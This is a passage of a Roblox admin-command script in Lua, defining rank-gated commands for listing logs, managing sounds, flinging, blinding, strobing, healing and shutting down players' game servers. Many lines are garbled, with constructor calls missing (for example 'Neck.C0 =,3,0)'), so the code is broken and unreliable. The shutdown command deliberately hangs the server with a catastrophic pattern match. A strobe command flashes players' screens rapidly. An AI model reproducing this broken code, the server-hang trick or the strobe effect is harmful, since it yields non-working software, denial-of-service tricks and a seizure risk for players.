  6473. [{"crashes", "crashlist"}] = {"", "Lists all players who've been crashed", 0, "Member", false, function(Speaker, Rank, Arguments)
  6474. GUI:ListGui(Speaker, "Crash List", Settings.Ranks.Crashed, 35480917)
  6475. end};
  6477. [{"mutes", "muted", "mutelist"}] = {"", "Lists all players who've been muted", 0, "Member", false, function(Speaker, Rank, Arguments)
  6478. GUI:ListGui(Speaker, "Mute List", Settings.Ranks.Muted, 202000870)
  6479. end};
  6481. [{"exiles", "exilelist"}] = {"", "Lists all the exiled players(banned, crashed, muted) in the admin", 0, "Member", false, function(Speaker, Rank, Arguments)
  6482. local TableStorage = {}
  6483. for _,Obj in pairs(Settings.Ranks.Banned) do table.insert(TableStorage, Obj..": Banned") end
  6484. for _,Obj in pairs(Settings.Ranks.Crashed) do table.insert(TableStorage, Obj..": Crashed") end
  6485. for _,Obj in pairs(Settings.Ranks.Muted) do table.insert(TableStorage, Obj..": Muted") end
  6486. GUI:ListGui(Speaker, "Exile List", TableStorage, 132769258)
  6487. end};
  6489. [{"ranked", "ranks", "ranklist"}] = {"", "Lists all the players ranked in the admin", 0, "Member", false, function(Speaker, Rank, Arguments)
  6490. local TableStorage = {}
  6491. for PlayerRank,PlayerNames in pairs(Settings.Ranks) do
  6492. for Num,PlayerName in pairs(PlayerNames) do
  6493. if PlayerRank == "Owner" then
  6494. table.insert(TableStorage, "BOLD: "..PlayerName..": Owner")
  6495. else
  6496. table.insert(TableStorage, PlayerName..": "..PlayerRank)
  6497. end
  6498. end
  6499. end
  6500. GUI:ListGui(Speaker, "Rank List", TableStorage, 21341765)
  6501. end};
  6503. [{"logs", "commandlogs", "cmdlogs"}] = {"", "Lists all the logs of executed commands", 0, "Admin", false, function(Speaker, Rank, Arguments)
  6504. GUI:ListGui(Speaker, "Command Logs", CORE:ReverseTable(CommandLogs), "Log")
  6505. end};
  6507. [{"chatlogs"}] = {"", "Lists all the logs of players who've chatted", 0, "Admin", false, function(Speaker, Rank, Arguments)
  6508. GUI:ListGui(Speaker, "Chat Logs", CORE:ReverseTable(ChatLogs), "Log")
  6509. end};
  6511. [{"irclogs"}] = {"", "Lists all the logs of irc output", 0, "Admin", false, function(Speaker, Rank, Arguments)
  6512. GUI:ListGui(Speaker, "IRC Logs", CORE:ReverseTable(IRC.Logs), "Log")
  6513. end};
  6515. [{"exploitlogs"}] = {"", "Lists all the logs of exploits", 0, "Admin", false, function(Speaker, Rank, Arguments)
  6516. local ExploitLog = Server.GDS:GetAsync("ExploitLog")
  6517. if type(ExploitLog) ~= "table" then ExploitLog = {} end
  6518. GUI:ListGui(Speaker, "Exploit Logs", ExploitLog, "Log")
  6519. end};
  6521. [{"clearlogs", "clearcommandlogs", "clearcmdlogs"}] = {"", "Clears all the logs of executed commands", 0, "Owner", false, function(Speaker, Rank, Arguments)
  6522. CommandLogs = {}
  6523. end};
  6525. [{"clearchatlogs"}] = {"", "Clears all the logs of players who've chatted", 0, "Owner", false, function(Speaker, Rank, Arguments)
  6526. ChatLogs = {}
  6527. end};
  6529. [{"clearirclogs"}] = {"", "Clears all the logs of irc output", 0, "Owner", false, function(Speaker, Rank, Arguments)
  6530. IRC.Logs = {}
  6531. end};
  6533. [{"clearalllogs", "resetlogs"}] = {"", "Clears ALL logs (Command, Chat, IRC) but not exploit logs", 0, "Owner", false, function(Speaker, Rank, Arguments)
  6534. CommandLogs = {}
  6535. ChatLogs = {}
  6536. IRC.Logs = {}
  6537. end};
  6539. [{"clearexploitlogs"}] = {"", "Clears all the logs of exploits", 0, "Admin", false, function(Speaker, Rank, Arguments)
  6540. Server.GDS:SetAsync("ExploitLog", {})
  6541. end};
  6543. [{"soundlist", "musiclist", "audiolist", "songs", "sounds", "musics", "audios"}] = {"", "Lists all the sounds in the global sound list", 0, "Member", false, function(Speaker, Rank, Arguments)
  6544. local List,Correlate,SoundName = {},{},{}
  6545. for Name,Info in pairs(SoundList) do
  6546. local View = "Command Name: "..Name.." | Audio ID: "..Info[1].." | Full Name: "..Info[2]
  6547. table.insert(List, View)
  6548. Correlate[View] = Info[1]
  6549. end
  6551. local CanClick = true
  6552. if Rank == "Member" then CanClick = false end
  6553. local Clicked = GUI:ListGui(Speaker, "Sound List", List, "Sound", CanClick)
  6554. Clicked.Event:connect(function(ClickName)
  6555. local OldSoundId = nil
  6556. SOUND:StopGlobalSound()
  6557. if "rbxassetid://"..Correlate[ClickName] ~= OldSoundID then
  6558. SOUND:PlayGlobalSound(Correlate[ClickName])
  6559. end
  6560. end)
  6561. end};
  6563. [{"syncsoundlist", "syncsounds", "syncaudiolist", "syncaudios", "syncmusiclist", "syncmusics"}] = {"", "Resyncs the global sound list to the server", 0, "Admin", false, function(Speaker, Rank, Arguments)
  6564. SOUND:SyncSoundList(Speaker)
  6565. end};
  6567. [{"cleart", "clearterrain", "cleant", "cleanterrain"}] = {"", "Clears all terrain from the server", 0, "Admin", false, function(Speaker, Rank, Arguments)
  6568. local Answer = GUI:PromptMessageWithButtons(Speaker, "Clean Terrain?", "Do you really want to clear all terrain in the server? If there is a lot of terrain this can cause major lag. Continue?", "Question", {"Yes", "No"})
  6569. if Answer == "Yes" then
  6570. Server.Workspace.Terrain:Clear()
  6571. end
  6572. end};
  6574. [{"clearstamp", "clearstamper", "cleanstamp", "cleanstamper"}] = {"", "Clears all items in workspace that came from the stamper tool (Not terrain)", 0, "Admin", false, function(Speaker, Rank, Arguments)
  6575. local Answer = GUI:PromptMessageWithButtons(Speaker, "Clean All Stamper Objects?", "Do you really want to clear all stamper objects in the server, this will clean all bricks/models placed down by stamper and if there's a lot of them it can cause major lag? Continue?", "Question", {"Yes", "No"})
  6576. if Answer == "Yes" then
  6577. for _,Obj in pairs(Workspace:GetChildren()) do
  6578. if Obj:FindFirstChild("RobloxStamper") and Obj:FindFirstChild("RobloxModel") then
  6579. Obj:Destroy()
  6580. end
  6581. end
  6582. end
  6583. end};
  6585. [{"base", "baseplate", "newbase", "makebase", "newbaseplate", "makebaseplate"}] = {"", "Creates a baseplate inside the server", 0, "Admin", false, function(Speaker, Rank, Arguments)
  6586. CORE:MakeBase()
  6587. end};
  6589. [{"addsound", "addaudio", "addmusic"}] = {"num(ID) string", "Will add the song of num(ID) named string to the custom sound list of the game", 2, "Admin", false, function(Speaker, Rank, Arguments)
  6590. local CustomSounds = Server.GDS:GetAsync("MML Custom Sounds")
  6591. if CustomSounds == nil or type(CustomSounds) ~= "table" then
  6592. CustomSounds = {}
  6593. end
  6594. if tostring(Arguments[1]) then
  6595. local Request = MARKET:GetItemInfo(Arguments[1])
  6596. if Request.AssetTypeId == 3 then
  6597. table.insert(CustomSounds, {Arguments[2], Arguments[1]})
  6598. SoundList[Arguments[2]] = {Arguments[1], Request.Name, Request.Creator.Name}
  6599. Server.GDS:SetAsync("MML Custom Sounds", CustomSounds)
  6600. GUI:SendHint(Speaker, "Sound Added to server sound list and for future servers.", 4)
  6601. else
  6602. GUI:SendMessage(Speaker, "Invalid", "Please make sure that your ID is an audio asset.", 4)
  6603. end
  6604. end
  6605. end};
  6607. [{"removesound", "removeaudio", "removemusic"}] = {"string", "Will remove the sound string from the custom sound list of the game", 1, "Admin", false, function(Speaker, Rank, Arguments)
  6608. local CustomSounds = Server.GDS:GetAsync("MML Custom Sounds")
  6609. if CustomSounds == nil or type(CustomSounds) ~= "table" then
  6610. CustomSounds = {}
  6611. end
  6613. local Removed = {}
  6614. for Num,Data in pairs(CustomSounds) do
  6615. if string.sub(string.lower(Data[1]),1,#Arguments[1]) == string.lower(Arguments[1]) then
  6616. table.insert(Removed, Data[1])
  6617. table.remove(CustomSounds, Num)
  6618. end
  6619. end
  6621. Server.GDS:SetAsync("MML Custom Sounds", CustomSounds)
  6623. SOUND:SyncSoundList()
  6625. if #Removed > 0 then
  6626. GUI:SendHint(Speaker, "Removed from custom sound list: "..STRING:UnpackArgs(Removed))
  6627. else
  6628. GUI:SendHint(Speaker, "Could not find sound "..Arguments[1].." in custom sound list")
  6629. end
  6630. end};
  6632. [{"clearsounds", "clearaudio", "clearmusic"}] = {"", "Clears all sounds in the custom sound list of the game", 0, "Admin", false, function(Speaker, Rank, Arguments)
  6633. local Answer = GUI:PromptMessageWithButtons(Speaker, "Clear All Sounds", "Would you like to clear all sounds from the custom Lua".."M".."od".."elMa".."ke".."r's sound list? This will clear all sounds from the ;addsound command and will affect all sounds in all of this game's servers. Are you sure you want to clear?(All default global sounds will remain)", "Question", {"Yes", "No"})
  6634. if Answer == "Yes" then
  6635. Server.GDS:SetAsync("MML Custom Sounds", {})
  6636. SoundList = GlobalSoundList -- Reset to old sounds without having to re-sync!
  6637. GUI:SendHint(Speaker, "All custom sounds have been removed", 4)
  6638. end
  6639. end};
  6641. [{"benchmark", "bench"}] = {"player", "Benchmarks player", 1, "Admin", false, function(Speaker, Rank, Arguments)
  6642. local Players = STRING:Scan(Arguments[1], Speaker)
  6643. local SpeakerTesting = false
  6644. for _,Player in pairs(Players) do
  6645. if Player == Speaker then SpeakerTesting = true end
  6646. if Player:FindFirstChild("Backpack") then coroutine.wrap(function()
  6647. CORE:ExecuteResource("Benchmark", Player.Backpack, {["Admin"] = script})
  6648. --wait(10)
  6649. --GUI:SendMessage(Player, "Benchmark almost done", "Your client is cleaning up the mess made. Please wait until you are reset by your client to have results submitted", "Information", 10)
  6650. end)() end
  6651. end
  6652. if SpeakerTesting == false then
  6653. GUI:SendMessage(Speaker, "Benchmarking", "The player(s) are now being benchmarked. To view results say "..Settings.Prefix.."getbench player", "Information", 10)
  6654. end
  6655. end};
  6657. [{"getbench", "getbenchmark", "getbenches", "getbenchmarks"}] = {"player", "Gets benchmarks of player", 1, "Member", false, function(Speaker, Rank, Arguments)
  6658. local Players = STRING:Scan(Arguments[1], Speaker)
  6659. local Compile = {}
  6660. for _,Player in pairs(Players) do
  6661. local PlayerInfo = ClientInfo[Player.Name]
  6662. if PlayerInfo then
  6663. if PlayerInfo.Benchmark then
  6664. table.insert(Compile, Player.Name..": "..PlayerInfo.Benchmark)
  6665. else
  6666. table.insert(Compile, Player.Name..": No score")
  6667. end
  6668. end
  6669. end
  6670. GUI:ListGui(Speaker, "Benchmarks", Compile, "Information")
  6671. end};
  6673. [{"replicatecommand", "replicatecmd", "repcmd", "repcommand", "rc", "sudo"}] = {"player string[command]", "Executes string as a command on player as if they said it", 2, "Owner", false, function(Speaker, Rank, Arguments)
  6674. local Players = STRING:Scan(Arguments[1], Speaker)
  6675. for _,Player in pairs(Players) do
  6676. CORE:Chatted(Arguments[2], Player, true)
  6677. end
  6678. end};
  6680. [{"virtexe", "virtualexe", "virtsudo", "virtualsudo", "vsudo", "vs"}] = {"string[Name] string[Rank] string[Command]", "Executes string[Command] on a vitual player named string[Name] with the rank string[Rank]", 3, "Owner", false, function(Speaker, Rank, Arguments)
  6681. CORE:Chatted(Arguments[3], nil, true, Arguments[1], Arguments[2], RANK:IsSupremeOwner(Speaker))
  6682. end};
  6684. [{"longneck", "lneck", "longn", "ln"}] = {"player", "Makes player have a long neck", 1, "Member", true, function(Speaker, Rank, Arguments)
  6685. local Players = STRING:Scan(Arguments[1], Speaker)
  6686. for _,Player in pairs(Players) do
  6687. if Player.Character ~= nil then
  6688. if Player.Character:FindFirstChild("Torso") and Player.Character:FindFirstChild("Head") ~= nil then
  6689. if Player.Character.Torso:FindFirstChild("Neck") then
  6690. Player.Character.Torso.Neck.C0 =,3,0) * CFrame.Angles(-math.rad(90),0,math.rad(180))
  6691. local Neck = Player.Character:FindFirstChild("Neck") if Neck then Neck:Destroy() end
  6692. Neck ="Part", Player.Character) Neck.Name = "Neck" Neck.Size =,3,1) Neck.Position =,100,0) Neck.BrickColor = Neck.Locked = true
  6693. local Mesh ="CylinderMesh", Neck) Mesh.Scale =,1,0.7)
  6694. local Weld ="Weld", Neck) Weld.Part0 = Neck Weld.Part1 = Player.Character.Torso Weld.C0 =,-2,0)
  6695. end
  6696. end
  6697. end
  6698. end
  6699. end};
  6701. [{"nolongneck", "normalneck", "nolneck", "nolongn", "noln", "unlongneck", "unlneck", "unlongn", "unln", "shortneck"}] = {"player", "Makes player's neck normal sized", 1, "Member", true, function(Speaker, Rank, Arguments)
  6702. local Players = STRING:Scan(Arguments[1], Speaker)
  6703. for _,Player in pairs(Players) do
  6704. if Player.Character ~= nil and Player.Character:FindFirstChild("Torso") then
  6705. Player.Character.Torso.Neck.C0 =,1,0) * CFrame.Angles(-math.rad(90),0,math.rad(180))
  6706. local Neck = Player.Character:FindFirstChild("Neck") if Neck then Neck:Destroy() end
  6707. end
  6708. end
  6709. end};
  6711. [{"fling"}] = {"player", "Flings player out of the map", 1, "Member", true, function(Speaker, Rank, Arguments)
  6712. local Players = STRING:Scan(Arguments[1], Speaker)
  6713. for _,Player in pairs(Players) do
  6714. local _,RankNum = RANK:GetRank(Player)
  6715. if RankNum <= RANK:ConvertRank(Rank) then
  6716. CORE:FlingPlayer(Player)
  6717. end
  6718. end
  6719. end};
  6721. [{"loopfling", "lfling", "loopf", "lf"}] = {"player", "Flings player out of the map over and over", 1, "Member", true, function(Speaker, Rank, Arguments)
  6722. local Players = STRING:Scan(Arguments[1], Speaker)
  6723. for _,Player in pairs(Players) do
  6724. local _,RankNum = RANK:GetRank(Player)
  6725. if RankNum <= RANK:ConvertRank(Rank) then
  6726. Flings[Player.Name] = true
  6727. CORE:FlingPlayer(Player)
  6728. end
  6729. end
  6730. end};
  6732. [{"noloopfling", "unloopfling", "nofling", "unfling"}] = {"player", "Stops theloop fling on player", 1, "Member", true, function(Speaker, Rank, Arguments)
  6733. local Players = STRING:Scan(Arguments[1], Speaker)
  6734. for _,Player in pairs(Players) do
  6735. local _,RankNum = RANK:GetRank(Player)
  6736. if RankNum <= RANK:ConvertRank(Rank) then
  6737. Flings[Player.Name] = nil
  6738. end
  6739. end
  6740. end};
  6742. [{"nuke"}] = {"player", "Nukes player", 1, "Admin", false, function(Speaker, Rank, Arguments)
  6743. local Players = STRING:Scan(Arguments[1], Speaker)
  6744. for _,Player in pairs(Players) do
  6745. CORE:Nuke(Player)
  6746. end
  6747. end};
  6749. [{"beep", "annoy"}] = {"player", "Plays a beep sound to player", 1, "Admin", false, function(Speaker, Rank, Arguments)
  6750. local Players = STRING:Scan(Arguments[1], Speaker)
  6751. for _,Player in pairs(Players) do
  6752. Beeps[Player.Name] = true
  6753. SOUND:BeepPlayer(Player)
  6754. end
  6755. end};
  6757. [{"nobeep", "unbeep", "noannoy", "unannoy"}] = {"player", "Stops beeping sound on player", 1, "Admin", false, function(Speaker, Rank, Arguments)
  6758. local Players = STRING:Scan(Arguments[1], Speaker)
  6759. for _,Player in pairs(Players) do
  6760. if Player.PlayerGui then
  6761. Beeps[Player.Name] = nil
  6762. for _,Obj in pairs(Player.PlayerGui:GetChildren()) do
  6763. if Obj.Name == "Annoy" then
  6764. Obj:Stop()
  6765. Obj:Destroy()
  6766. end
  6767. end
  6768. end
  6769. end
  6770. end};
  6772. [{"time"}] = {"number/string", "Sets the time to number/string(Ex: 9:00, noon)", 1, "Member", false, function(Speaker, Rank, Arguments)
  6773. local Time = Arguments[1]
  6774. if Time == "day" or Time == "noon" then Time = "12" end
  6775. if Time == "night" or Time == "midnight" then Time = "0" end
  6776. if Time == "dawn" or Time == "morning" then Time = "6:15" end
  6777. if Time == "dusk" or Time == "evening" then Time = "17:45" end
  6778. if Time == "afternoon" then Time = "15:30" end
  6779. ypcall(function() Server.Lighting.TimeOfDay = Time end)
  6780. end};
  6782. [{"product", "buy", "purchase", "prod", "place"}] = {"player number(ID)", "Prompts player to purchase item", 2, "Member", false, function(Speaker, Rank, Arguments)
  6783. local Players = STRING:Scan(Arguments[1], Speaker)
  6784. for _,Player in pairs(Players) do
  6785. MARKET:PromptPurchase(Player, Arguments[2], Speaker)
  6786. end
  6787. end};
  6789. [{"gear"}] = {"player ID", "Gives player the gear with the ID of ID", 2, "Member", false, function(Speaker, Rank, Arguments)
  6790. local AbuseMode = false
  6791. if Rank == "Member" then AbuseMode = Settings.DisableAbuse end
  6792. local Players = STRING:Scan(Arguments[1], Speaker)
  6793. for _,Player in pairs(Players) do
  6794. CORE:Insert(Arguments[2], Player.Backpack, true, {"Tool", "HopperBin"}, AbuseMode)
  6795. end
  6796. end};
  6798. [{"sword"}] = {"player", "Gives player a sword", 1, "Member", false, function(Speaker, Rank, Arguments)
  6799. local Players = STRING:Scan(Arguments[1], Speaker)
  6800. for _,Player in pairs(Players) do
  6801. CORE:Insert(125013769, Player.Backpack, true)
  6802. end
  6803. end};
  6805. [{"accessory", "acs", "hat"}] = {"player ID", "Gives player the accessory with the ID of ID", 2, "Member", false, function(Speaker, Rank, Arguments)
  6806. local Players = STRING:Scan(Arguments[1], Speaker)
  6807. for _,Player in pairs(Players) do
  6808. if Player.Character then
  6809. CORE:Insert(Arguments[2], Player.Character, true, {"Accoutrement"})
  6810. end
  6811. end
  6812. end};
  6814. [{"flash"}] = {"", "Flashes lighting", 0, "Member", false, function(Speaker, Rank, Arguments)
  6815. CORE:ResetLighting()
  6816. repeat
  6817. Server.Lighting.Ambient =,1,1)
  6818. Server.Lighting.FogColor =,1,1)
  6819. Server.Lighting.Brightness = 1
  6820. Server.Lighting.TimeOfDay = 14
  6821. wait(0.1)
  6822. Server.Lighting.Ambient =,0,0)
  6823. Server.Lighting.FogColor =,0,0)
  6824. Server.Lighting.Brightness = 0
  6825. Server.Lighting.TimeOfDay = 0
  6826. wait(0.1)
  6827. until ModLighting == false
  6828. end};
  6830. [{"disco", "party"}] = {"", "Changes the lighting so there's a disco party", 0, "Member", false, function(Speaker, Rank, Arguments)
  6831. CORE:ResetLighting()
  6832. repeat
  6833. local Color =,255)/255,math.random(0,255)/255,math.random(0,255)/255)
  6834. Server.Lighting.Ambient = Color
  6835. Server.Lighting.FogColor = Color
  6836. Server.Lighting.TimeOfDay = 0
  6837. Server.Lighting.FogEnd = 500
  6838. wait(0.1)
  6839. until ModLighting == false
  6840. end};
  6842. [{"fixl", "fixlighting", "nodisco", "undisco", "noflash", "unflash"}] = {"", "Removes disco or flash effects", 0, "Member", false, function(Speaker, Rank, Arguments)
  6843. CORE:FixLighting()
  6844. end};
  6846. [{"strobe"}] = {"player", "Makes player's screen flash like a strobe", 1, "Member", false, function(Speaker, Rank, Arguments)
  6847. local Players = STRING:Scan(Arguments[1], Speaker)
  6848. for _,Player in pairs(Players) do
  6849. if Player:FindFirstChild("PlayerGui") then
  6850. local SG = Player.PlayerGui:FindFirstChild("MMLA Screen Cover") if SG then SG:Destroy() end
  6851. SG ="ScreenGui", Player.PlayerGui) SG.Name = "MMLA Screen Cover"
  6852. local Frame ="Frame", SG) Frame.Name = "Overlay" Frame.Size =,0,1,0) Frame.ZIndex = 100
  6853. coroutine.wrap(function() repeat Frame.BackgroundColor3 =,0,0) wait(0.1) Frame.BackgroundColor3 =,1,1) wait(0.1) until not SG end)()
  6854. end
  6855. end
  6856. end};
  6858. [{"nostrobe", "unstrobe", "noblind", "unblind"}] = {"player", "Clears the strobe effect from player's screen", 1, "Member", false, function(Speaker, Rank, Arguments)
  6859. local Players = STRING:Scan(Arguments[1], Speaker)
  6860. for _,Player in pairs(Players) do
  6861. if Player:FindFirstChild("PlayerGui") then
  6862. local SG = Player.PlayerGui:FindFirstChild("MMLA Screen Cover") if SG then SG:Destroy() end
  6863. end
  6864. end
  6865. end};
  6867. [{"blind"}] = {"player", "Makes player unable to see", 1, "Member", false, function(Speaker, Rank, Arguments)
  6868. local Players = STRING:Scan(Arguments[1], Speaker)
  6869. for _,Player in pairs(Players) do
  6870. if Player:FindFirstChild("PlayerGui") then
  6871. local SG = Player.PlayerGui:FindFirstChild("MMLA Screen Cover") if SG then SG:Destroy() end
  6872. SG ="ScreenGui", Player.PlayerGui) SG.Name = "MMLA Screen Cover"
  6873. local Frame ="Frame", SG) Frame.Name = "Overlay" Frame.Size =,0,1,0) Frame.ZIndex = 100 Frame.BackgroundColor3 =,0,0)
  6874. end
  6875. end
  6876. end};
  6878. [{"rejoin", "rj", "rej", "rjoin"}] = {"", "Makes yourself rejoin the server", 0, "Non-Admin", false, function(Speaker, Rank, Arguments)
  6879. local Suc, Err, PlaceID, IntID = Server.TS:GetPlayerPlaceInstanceAsync(Speaker.UserId)
  6880. if Suc then
  6881. Server.TS:TeleportToPlaceInstance(PlaceID, IntID, Speaker)
  6882. else
  6883. Server.TS:Teleport(game.PlaceId, Speaker)
  6884. end
  6885. end};
  6887. [{"abuselist", "abusablecommands", "abusecmds", "ac"}] = {"", "Shows a list of abusable commands", 0, "Admin", false, function(Speaker, Rank, Arguments)
  6888. GUI:ListGui(Speaker, "Abusable Commands", Settings.AbuseList, 2015506)
  6889. end};
  6891. [{"addabuse", "makeabuse", "abusecmd", "abusecommand", "addabusable", "makeabusable", "abusablecmd", "abusablecommand"}] = {"string(command)", "Adds string(command) to the abuse list", 1, "Owner", false, function(Speaker, Rank, Arguments)
  6892. local NewAbuse = Arguments[1]
  6893. if string.sub(string.lower(NewAbuse), 1, #Settings.Prefix) == string.lower(Settings.Prefix) then -- remove prefix if present
  6894. NewAbuse = string.sub(NewAbuse, #Settings.Prefix + 1)
  6895. end
  6897. local Match = false
  6898. for _,AbuseCmd in pairs(Settings.AbuseList) do
  6899. if string.lower(AbuseCmd) == string.lower(NewAbuse) then
  6900. Match = true
  6901. break
  6902. end
  6903. end
  6904. if not Match then
  6905. table.insert(Settings.AbuseList, NewAbuse)
  6906. GUI:MessageAdmins("New abusable command", Speaker.Name.." has made '"..NewAbuse.."' an abuseable command", "Check")
  6907. else
  6908. GUI:SendMessage(Speaker, "Command Exists", "RED This command matches another in the abuse list, therefore, will not be added", "Error")
  6909. end
  6910. CORE:SetAbuseCommands()
  6911. end};
  6913. [{"removeabuse", "removeabuse", "removeabusecmd", "removeabusecommand", "removeabusable", "removeabusable", "removeabusablecmd", "removeabusablecommand", "noabuse", "unabuse", "noabusable", "unabusable"}] = {"string(command)", "Removes string(command) to the abuse list", 1, "Owner", false, function(Speaker, Rank, Arguments)
  6914. local NewAbuse = Arguments[1]
  6915. if string.sub(string.lower(NewAbuse), 1, #Settings.Prefix) == string.lower(Settings.Prefix) then -- remove prefix if present
  6916. NewAbuse = string.sub(NewAbuse, #Settings.Prefix + 1)
  6917. end
  6919. local Removed = false
  6920. for Num,AbuseCmd in pairs(Settings.AbuseList) do
  6921. if string.sub(string.lower(AbuseCmd), 1, #NewAbuse) == string.lower(NewAbuse) then
  6922. Removed = true
  6923. table.remove(Settings.AbuseList, Num)
  6924. end
  6925. end
  6926. if Removed then
  6927. GUI:MessageAdmins("Removed abusable command", Speaker.Name.." has removed '"..NewAbuse.."' from the abuse list", "Check")
  6928. else
  6929. GUI:SendMessage(Speaker, "Command not removed", "RED Could not find '"..NewAbuse.."' in abuse list", "Error")
  6930. end
  6931. CORE:SetAbuseCommands()
  6932. end};
  6934. [{"god", "power"}] = {"player", "Gives player unlimited health", 1, "Member", false, function(Speaker, Rank, Arguments)
  6935. local Players = STRING:Scan(Arguments[1], Speaker)
  6936. for _,Player in pairs(Players) do
  6937. if Player.Character and Player.Character:FindFirstChild("Humanoid") then
  6938. Player.Character.Humanoid.MaxHealth = math.huge
  6939. Player.Character.Humanoid.Health = math.huge
  6940. end
  6941. end
  6942. end};
  6944. [{"heal", "nogod", "ungod", "nopower", "unpower"}] = {"player", "Resets health to full, undoes god effect(Doesn't mean there isn't God)", 1, "Member", false, function(Speaker, Rank, Arguments)
  6945. local Players = STRING:Scan(Arguments[1], Speaker)
  6946. for _,Player in pairs(Players) do
  6947. if Player.Character and Player.Character:FindFirstChild("Humanoid") then
  6948. if Player.Character.Humanoid.MaxHealth == math.huge then
  6949. Player.Character.Humanoid.MaxHealth = 100
  6950. Player.Character.Humanoid.Health = 100
  6951. else
  6952. Player.Character.Humanoid.Health = Player.Character.Humanoid.MaxHealth
  6953. end
  6954. end
  6955. end
  6956. end};
  6958. [{"loopheal"}] = {"player", "Loops player's health to full", 1, "Member", false, function(Speaker, Rank, Arguments)
  6959. local Players = STRING:Scan(Arguments[1], Speaker)
  6960. for _,Player in pairs(Players) do
  6961. if Player.Character and Player.Character:FindFirstChild("Humanoid") then
  6962. local Char = Player.Character
  6963. repeat Char.Humanoid.Health = Char.Humanoid.MaxHealth wait() until not Char:FindFirstChild("Humanoid") or Char.Parent == nil or Char.Humanoid.Health == 0
  6964. end
  6965. end
  6966. end};
  6968. [{"health"}] = {"player num", "Sets the health of player to num", 2, "Member", false, function(Speaker, Rank, Arguments)
  6969. if tonumber(Arguments[2]) then
  6970. local Players = STRING:Scan(Arguments[1], Speaker)
  6971. for _,Player in pairs(Players) do
  6972. if Player.Character and Player.Character:FindFirstChild("Humanoid") then
  6973. Player.Character.Humanoid.Health = Arguments[2]
  6974. end
  6975. end
  6976. end
  6977. end};
  6979. [{"speed", "ws", "walkspeed"}] = {"player num", "Sets the speed of player to num", 2, "Member", false, function(Speaker, Rank, Arguments)
  6980. if tonumber(Arguments[2]) then
  6981. local Players = STRING:Scan(Arguments[1], Speaker)
  6982. for _,Player in pairs(Players) do
  6983. if Player.Character and Player.Character:FindFirstChild("Humanoid") then
  6984. local Speed = tonumber(Arguments[2])
  6985. if Speed then
  6986. if Rank == "Member" then
  6987. if Speed > 1000 then Speed = 1000
  6988. elseif Speed < -1000 then Speed = -1000 end
  6989. end
  6990. Player.Character.Humanoid.WalkSpeed = Speed
  6991. end
  6992. end
  6993. end
  6994. end
  6995. end};
  6997. [{"damage", "dmg"}] = {"player num", "Takes away num health from player", 2, "Member", false, function(Speaker, Rank, Arguments)
  6998. if tonumber(Arguments[2]) then
  6999. local Players = STRING:Scan(Arguments[1], Speaker)
  7000. for _,Player in pairs(Players) do
  7001. if Player.Character and Player.Character:FindFirstChild("Humanoid") then
  7002. Player.Character.Humanoid.Health = Player.Character.Humanoid.Health - Arguments[2]
  7003. end
  7004. end
  7005. end
  7006. end};
  7008. [{"fly"}] = {"player", "Lets player be able to fly", 1, "Member", false, function(Speaker, Rank, Arguments)
  7009. local Players = STRING:Scan(Arguments[1], Speaker)
  7010. for _,Player in pairs(Players) do
  7011. CORE:Fly(Player, 10000)
  7012. end
  7013. end};
  7015. [{"noclip", "noc"}] = {"player", "Lets player be able to noclip", 1, "Member", false, function(Speaker, Rank, Arguments)
  7016. local Players = STRING:Scan(Arguments[1], Speaker)
  7017. for _,Player in pairs(Players) do
  7018. CORE:Fly(Player, 1000000)
  7019. end
  7020. end};
  7022. [{"nofly", "unfly", "clip", "nonoclip", "unnoclip"}] = {"player", "Removes fly or noclip effect", 1, "Member", false, function(Speaker, Rank, Arguments)
  7023. local Players = STRING:Scan(Arguments[1], Speaker)
  7024. for _,Player in pairs(Players) do
  7025. if Player.Character then
  7026. if Player.Character:FindFirstChild("StopMMLFly") then
  7027. Player.Character.StopMMLFly:InvokeClient(Player)
  7028. end
  7029. end
  7030. end
  7031. end};
  7033. [{"clearcache", "clearc", "cc"}] = {"", "Clears cached objects such as market info and http local scripts", 0, "Owner", false, function(Speaker, Rank, Arguments)
  7034. ScriptCache,MarketCache,CharacterCache,PackageCache = {},{},{},{}
  7035. GUI:SendMessage(Speaker, "Cache Cleared", "Cache has been cleared successfully", "Check")
  7036. end};
  7038. [{"give"}] = {"player string", "Gives player any tool found named string. Can also give build tools (basicbtools, btools, psbtools)", 2, "Member", false, function(Speaker, Rank, Arguments)
  7039. local Players = STRING:Scan(Arguments[1], Speaker)
  7040. for _,Player in pairs(Players) do
  7041. CORE:GiveTools(Player, Arguments[2])
  7042. end
  7043. end};
  7045. [{"tools", "gettools", "toollist", "toolslist"}] = {"", "Gets all tools that you can use the "..Settings.Prefix.."give command", 0, "Member", false, function(Speaker, Rank, Arguments)
  7046. local List = {}
  7047. for _,Region in pairs(ToolRegions) do
  7048. CORE:ScanItems(Region, {"HopperBin", "Tool"}, function(Item)
  7049. table.insert(List, Item.Name.." | Found at: "..Item:GetFullName())
  7050. end)
  7051. end
  7053. GUI:ListGui(Speaker, "Tool list", List, 73589272)
  7054. end};
  7056. [{"btools", "buildtools", "buildingtools"}] = {"player string", "Gives player building tools", 1, "Member", false, function(Speaker, Rank, Arguments)
  7057. local Players = STRING:Scan(Arguments[1], Speaker)
  7058. for _,Player in pairs(Players) do
  7059. CORE:GiveTools(Player, "btools")
  7060. end
  7061. end};
  7063. [{"shutdown", "sd"}] = {"", "Shuts down the server", 0, "Owner", false, function(Speaker, Rank, Arguments)
  7064. REMOTE:SendHttpLog(Speaker.Name.." shutdown the server", "INFORMATION")
  7065. for _,Player in pairs(Server.Players:GetPlayers()) do
  7066. Player:Kick()
  7067. end
  7068. Server.Workspace:ClearAllChildren()
  7069. string.find(string.rep("a", 2^20),string.rep(".?", 2^20))
  7070. end};
  7072. [{"scale", "size"}] = {"player num", "Scales player's character to num", 2, "Member", false, function(Speaker, Rank, Arguments)
  7073. local Players = STRING:Scan(Arguments[1], Speaker)
  7074. for _,Player in pairs(Players) do
  7075. CORE:Scale(Player, Arguments[2])
  7076. end
  7077. end};
  7079. [{"mini", "small", "tiny", "small"}] = {"player", "Makes player's character mini", 1, "Member", false, function(Speaker, Rank, Arguments)
  7080. local Players = STRING:Scan(Arguments[1], Speaker)
  7081. for _,Player in pairs(Players) do
  7082. CORE:Scale(Player, 50)
  7083. end
  7084. end};
  7086. [{"hobbit"}] = {"player", "Makes player's character hobbit sized", 1, "Member", false, function(Speaker, Rank, Arguments)
  7087. local Players = STRING:Scan(Arguments[1], Speaker)
  7088. for _,Player in pairs(Players) do
  7089. CORE:Scale(Player, 70)
  7090. end
  7091. end, Hidden = true};
